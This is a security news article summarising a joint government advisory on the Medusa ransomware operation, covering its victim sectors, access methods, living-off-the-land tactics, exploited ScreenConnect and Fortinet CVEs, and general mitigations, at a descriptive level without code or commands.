Medusa Ransomware Operation Impacted Over 300 Critical Infrastructure Organizations Until February 2025

The Medusa ransomware operation has had a significant impact on critical infrastructure organizations in the United States until February 2025. The FBI, CISA, and MS-ISAC have issued a joint advisory detailing the tactics, techniques, and indicators of compromise (IOCs) used by the Medusa threat actors.

The Medusa ransomware variant is a type of ransomware-as-a-service (RaaS) that was first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from various critical infrastructure sectors, including medical, education, legal, insurance, technology, and manufacturing. The affected industries are listed below:

* Medical * Education * Legal * Insurance * Technology * Manufacturing

The Medusa ransomware operation is distinct from other variants of the same name, such as MedusaLocker and Medusamobile malware.

Medusa Ransomware Tactics and Techniques

According to the joint advisory, Medusa threat actors recruit initial access brokers (IABs) through cybercriminal forums, offering payments ranging from $100 to $1 million. The group's affiliates gain access to victims by using phishing campaigns to steal credentials and exploiting unpatched software vulnerabilities.

The Medusa operators use living off the land (LOTL) techniques and legitimate tools like Advanced IP Scanner and SoftPerfect Network Scanner for reconnaissance activity. They scan ports such as FTP, SSH, HTTP, SQL databases, and RDP after gaining a foothold. They conduct network and filesystem enumeration using PowerShell and Windows Command Prompt.

Additionally, operators utilize Windows Management Instrumentation (WMI) to query system information. Medusa actors use LOTL techniques to evade detection and employing certutil.exe for stealthy file ingress. The experts observed the operators deleting PowerShell command history to cover tracks.

The researchers report that the ransomware rely on Ligolo for reverse tunneling and Cloudflared to expose systems securely without direct internet exposure. Medusa operators leverage legitimate remote access tools like AnyDesk, Atera, and Splashtop, alongside RDP and PsExec, to move laterally and locate files for exfiltration and encryption.

Medusa Ransomware Indicators of Compromise (IOCs) and Mitigations

The FBI investigations identified several indicators of compromise (IOCs) used by the Medusa threat actors:

* Targeted CVE-2024-1709 (ScreenConnect authentication bypass) * Exploited CVE-2023-48788 (Fortinet EMS SQL injection) * Utilized living off the land (LOTL) techniques * Employed legitimate tools like Advanced IP Scanner and SoftPerfect Network Scanner for reconnaissance activity

To mitigate these threats, the following measures can be taken:

* Regularly update software and systems to patch known vulnerabilities. * Implement strong security controls, including intrusion detection and prevention systems. * Use legitimate remote access tools and ensure they are properly configured and monitored. * Conduct regular backups and test them to ensure recoverability.

By understanding the tactics, techniques, and indicators of compromise used by Medusa ransomware threat actors, organizations can take proactive steps to prevent attacks and minimize the impact of a potential breach.